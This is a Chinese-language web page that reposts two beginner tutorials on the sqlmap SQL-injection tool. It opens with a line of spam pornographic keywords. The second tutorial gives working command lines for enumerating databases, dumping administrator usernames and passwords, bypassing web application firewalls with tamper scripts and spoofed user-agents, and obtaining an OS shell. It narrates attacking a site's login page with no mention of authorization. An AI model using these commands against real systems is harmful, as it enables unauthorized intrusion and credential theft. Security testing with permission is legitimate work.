欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

sqlmap 入門(mén)級(jí)使用(簡(jiǎn)易教程)

  發(fā)布時(shí)間:2015-09-30 15:34:37   作者:佚名   我要評(píng)論
這篇文章主要介紹了sqlmap 入門(mén)級(jí)使用(簡(jiǎn)易教程),需要的朋友可以參考下

雖然我用過(guò)mssql和oracle,但表示只是用過(guò),不是很熟,所以本文大多數(shù)都在說(shuō)MySQL數(shù)據(jù)庫(kù)。

一、數(shù)據(jù)庫(kù)

數(shù)據(jù)庫(kù)管理系統(tǒng)  ->  數(shù)據(jù)庫(kù)(可能存在多個(gè)) ->   表(一般一個(gè)數(shù)據(jù)庫(kù)中都存儲(chǔ)多個(gè)表) -> 字段  (一般一個(gè)表中都有多個(gè)字段)

也就是說(shuō):一般都是一對(duì)多的關(guān)系,這里就不深究了,我們先來(lái)看看表(tables)的結(jié)構(gòu)。

  

這是從phpmyadmin中截取的一張圖片,看起來(lái)是不是有點(diǎn)像excel 表格呢?

數(shù)據(jù)庫(kù)中一般都會(huì)存儲(chǔ)很多數(shù)據(jù),包括我們的用戶(hù)名和密碼,所以很多黑客就喜歡搞數(shù)據(jù)庫(kù)咯。

二、sqlmap 枚舉數(shù)據(jù)庫(kù)

首先進(jìn)入終端,如果是Linux,就是terminal,如果是Windows,就是cmd。

當(dāng)然,進(jìn)行sql注入之前,你先要找到注入點(diǎn),怎么找?google什么的,貌似還有些工具,我這里只是為了記錄sqlmap的使用過(guò)程,不做深入。

1、枚舉數(shù)據(jù)庫(kù)


參數(shù)-u 表示URL,也就是注入點(diǎn)了,--dbs表示枚舉數(shù)據(jù)庫(kù),說(shuō)枚舉太官方了,我們不如說(shuō):請(qǐng)sqlmap列出所有的數(shù)據(jù)庫(kù)名。

2、枚舉表  tables


使用-D 參數(shù),把剛才枚舉出來(lái)的數(shù)據(jù)庫(kù)寫(xiě)到后面。--tables表示枚舉這個(gè)數(shù)據(jù)庫(kù)下面的表。

結(jié)果為:


那么我們就可以猜測(cè)那個(gè)數(shù)據(jù)庫(kù)下面是用戶(hù)名和密碼了,也可以把數(shù)據(jù)庫(kù)dump到我們的電腦上。進(jìn)行分析。

3、枚舉字段


意思就是說(shuō),枚舉這個(gè)數(shù)據(jù)庫(kù)下面的這個(gè)表,下面有哪些字段。

4、數(shù)據(jù)dump


這個(gè)命令表示dump當(dāng)前這個(gè)數(shù)據(jù)庫(kù),下面的這個(gè)表中的所有數(shù)據(jù)。


如果這個(gè)表中剛好是管理員的用戶(hù)名和密碼的話(huà),就可以嘗試進(jìn)行后臺(tái)掃描和登錄了。


總結(jié):注入漏洞是一個(gè)經(jīng)典的漏洞,我這里只是簡(jiǎn)單描述sqlmap的使用方法,關(guān)于高級(jí)的方式請(qǐng)參考官方說(shuō)明。

 sql注入雖然是個(gè)老是的注入攻擊方式,當(dāng)目前已經(jīng)出現(xiàn)其它類(lèi)型的變形注入,還是需要web開(kāi)發(fā)者繼續(xù)關(guān)注安全。

sqlmap簡(jiǎn)易教程–幫助文檔個(gè)人使用經(jīng)驗(yàn)解析

最近看到很多大牛發(fā)sqlmap的視頻教程。

然后偶就屁顛屁顛滾去下了一個(gè),然后尼瑪,一連從頭看到尾。。。。。。各種科普啊,看視頻有點(diǎn)浪費(fèi)時(shí)間。
各位別去被坑爹了,來(lái)個(gè)sqlmap 簡(jiǎn)易教程算了,何必浪費(fèi)看視頻的時(shí)間。
sqlmap 再牛逼也就是個(gè)python的腳本,腳本再牛逼也得有–help -hh
所以第一件事當(dāng)然是滾去看幫助文檔。
sqlmap -hh
我操。。。。。。。這么多英文,多少只草泥馬在心中奔騰,咋辦,硬著頭皮看唄,有些人頭皮硬不了咋辦,簡(jiǎn)單,來(lái),哥教你簡(jiǎn)單的
注入分法不同,種類(lèi)不同,來(lái)個(gè)簡(jiǎn)單的分類(lèi):
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” 
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3.cookie類(lèi)注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
好,區(qū)分完畢再來(lái)后續(xù)的
需要數(shù)據(jù)庫(kù)好:–dbs
得到數(shù)據(jù)庫(kù)名稱(chēng)xxx,需要表: -D xxx –tables
得到表名xxxx,需要段:-D xxx -T xxxx –columns
得到段內(nèi)有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump
那么我們來(lái)理解一下,-D -T -C 是干嗎的,當(dāng)然就是知道其名稱(chēng),指定使用其。
–dbs –tables –columns 是干嗎的,當(dāng)然就是不知道名稱(chēng),列出來(lái)唄
–dump 那自然就是字面意思,類(lèi)似于導(dǎo)出數(shù)據(jù)的行為
其實(shí)注入有了上面這幾個(gè)命令,妥妥的夠用了,不過(guò)還需要繞waf –tamper=”"
注入被識(shí)別出來(lái)是工具,斷開(kāi)咋辦–user-agent=”"
再多牛逼的功能都是慢慢積累出來(lái)的,別想一口吃成胖子

好,跑數(shù)據(jù)庫(kù)就是這么簡(jiǎn)單,于是呢來(lái)一個(gè)稍微有點(diǎn)干貨的例子:
http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷貝post數(shù)據(jù),很麻煩,我想讓sqlmap自動(dòng)跑post注入
sqlmap -u “http://www.xxx.com/login.asp” –forms
很好,上面的命令成功的幫我跑了post注入,并且找到了post的注入點(diǎn)jjj=123
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
于是我用上面的命令看看數(shù)據(jù)庫(kù)
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
順便看看當(dāng)前用戶(hù)是不是dba
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a 
用了上面的命令 -a能得到什么呢:自己去看幫助吧。
幫你篩選了一下,-a下面的那些命令是用來(lái)看用戶(hù),看主機(jī),看權(quán)限的。
后來(lái)呢,我發(fā)現(xiàn)權(quán)限還是挺高的,同時(shí)呢,我跑出來(lái)了數(shù)據(jù)庫(kù)名稱(chēng)kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
同時(shí)我找到了網(wǎng)站路徑,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以執(zhí)行系統(tǒng)命令,同時(shí)還發(fā)現(xiàn)了牛逼的xpcmdshell –os-shell
以及很多牛逼的文件操作命令–file-xx 這些命令在需要用的時(shí)候使用就是了,會(huì)給你帶來(lái)意想不到的驚喜
與此同時(shí),我發(fā)現(xiàn)tables里面沒(méi)有我想要的東西,我也找不到合適的內(nèi)容,咋辦呢,心一橫,我決定把所有的數(shù)據(jù)庫(kù)內(nèi)容跑出來(lái)自己找,于是我這么做:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
然后牛逼的sqlmap就開(kāi)始跑啊跑,然后緊接著我的蛋就碎了,尼瑪,sqlmap一會(huì)就問(wèn)你一次要不要破解密碼,要不要這個(gè),要不要那個(gè),我和我的小朋友們都想擦你妹夫,功夫不負(fù)有心人,我又看見(jiàn)了一個(gè)命令 –batch 可以自動(dòng)選擇sqlmap默認(rèn)選項(xiàng)
于是,我可以和我的小朋友們玩耍去了,再也不用看著sqlmap拖庫(kù)了。

總結(jié)下來(lái),幫助文檔還是很重要的,多看看,總會(huì)有些收獲:
為了避免各位看英文看到吐,大概總結(jié)下:
Target: 字面意思,目標(biāo),那么就是確定目標(biāo)的
Request: 字面意思,請(qǐng)求,就是定義請(qǐng)求內(nèi)容的,比如post數(shù)據(jù),http頭,cookie注入,http頭污染等等
Optimization:字面意思,調(diào)節(jié)性能,等等
Injection: 字面意思,注入的設(shè)置內(nèi)容基本在這里,比如指定注入點(diǎn),指定db,指定系統(tǒng),等等
Detection:
基本就是用在確認(rèn)注入范圍,尋找注入點(diǎn)區(qū)域,這些
Technique:
基本用在確定注入手段,以及攻擊方式
Fingerprint:
基本用在指紋識(shí)別,用的很少
Enumeration:
枚舉信息,主要用在注入中,很重要,很常用
Brute force:
用來(lái)爆破,其實(shí)主要是枚舉tables columns用的
User-defined function injection:
現(xiàn)在只有udf提權(quán),以及指定一些自己定義的sqlmap腳本用,高端使用,求大牛指點(diǎn)
File system access
主要是文件讀取,文件寫(xiě)入
Operating system access 
主要用在對(duì)系統(tǒng)操作,例如os-shell 以及 后續(xù)的連接metasploit 實(shí)現(xiàn)后滲透攻擊
windows registry access
基本就是注冊(cè)表操作了
General
字面意思,綜合的內(nèi)容,一些特殊的功能實(shí)現(xiàn),我在這里找到了crawl batch這些非常好用的參數(shù)
Miscellaneous
目測(cè)高端應(yīng)用,還沒(méi)怎么用過(guò),求大神指教
如上面總結(jié)的,大概紅字就是常用的命令,剩下的不常用里面也有很多很不錯(cuò),在特殊情況下適用的內(nèi)容,反正本貼科普而已。

字有點(diǎn)多,想看的菜鳥(niǎo)朋友認(rèn)真看下來(lái)應(yīng)該會(huì)有些收獲,菜鳥(niǎo)們?nèi)绻惺裁雌渌钠婕家桑€希望分享1、2 共同進(jìn)步?。?/p>

相關(guān)文章

  • SQL注入之SQLmap入門(mén) (注入檢測(cè)工具)

    SQLmap是一款用來(lái)檢測(cè)與利用SQL注入漏洞的免費(fèi)開(kāi)源工具,有一個(gè)非常棒的特性,即對(duì)檢測(cè)與利用的自動(dòng)化處理(數(shù)據(jù)庫(kù)指紋、訪問(wèn)底層文件系統(tǒng)、執(zhí)行命令)
    2015-09-30
  • SQLMAP Win 下Python環(huán)境運(yùn)行不正常解決方法(已測(cè))

    這篇文章主要介紹了SQLMAP Win 下Python環(huán)境運(yùn)行不正常解決方法(已測(cè)),需要的朋友可以參考下
    2015-09-04
  • sqlmap用戶(hù)手冊(cè)[續(xù)篇]

    上一篇文章《sqlmap用戶(hù)手冊(cè)》其實(shí)只寫(xiě)了大部分可能用到的參數(shù),還有些并未寫(xiě),這次補(bǔ)上~
    2014-07-29
  • SqlMap用戶(hù)手冊(cè)

    sqlmap 是一個(gè)自動(dòng)SQL 射入工具。文章內(nèi)容有點(diǎn)長(zhǎng),但都是精華,讀者們耐心的看吧,續(xù)篇的鏈接在文末。
    2014-07-29
  • Sqlmap注入技巧集錦

    sqlmap 是一個(gè)自動(dòng)SQL 射入工具。本文收集了一些利用Sqlmap做注入測(cè)試的TIPS,其中也包含一點(diǎn)繞WAF的技巧,便于大家集中查閱,歡迎接樓補(bǔ)充、分享。
    2014-07-29
  • win下安裝sqlmap的方法分享

    在Windows XP上安裝和運(yùn)行SqlMap的步驟分享,其實(shí)就是安裝一個(gè)python,然后將gui界面復(fù)制到里面
    2015-09-03
  • SQLMAP 使用教程(視頻動(dòng)畫(huà))

    SQLMAP 視頻動(dòng)畫(huà)教程,方便新手朋友
    2012-10-16
  • sqlmap 簡(jiǎn)單mysql注入演示[附截圖]

    看大牛的視頻,學(xué)習(xí)一下,附上截圖 算是轉(zhuǎn)載吧...只是為了分享一下,方便需要的朋友
    2012-10-16
  • SQLMAP 注射工具中文使用用法

    SQLMAP 注射工具用法 著名黑客注射工具sqlmap的使用方法
    2012-10-16
  • sqlmap 一個(gè)自動(dòng)SQL 射入工具(sqlmap.py)漢化直接可用版

    sqlmap 是一個(gè)自動(dòng)SQL 射入工具。它是可勝任執(zhí)行一個(gè)廣泛的數(shù)據(jù)庫(kù)管理系統(tǒng)后端指印, 檢索遙遠(yuǎn)的DBMS 數(shù)據(jù)庫(kù), usernames, 桌, 專(zhuān)欄, 列舉整個(gè)DBMS, 讀了系統(tǒng)文件和利用導(dǎo)致S
    2015-01-04

最新評(píng)論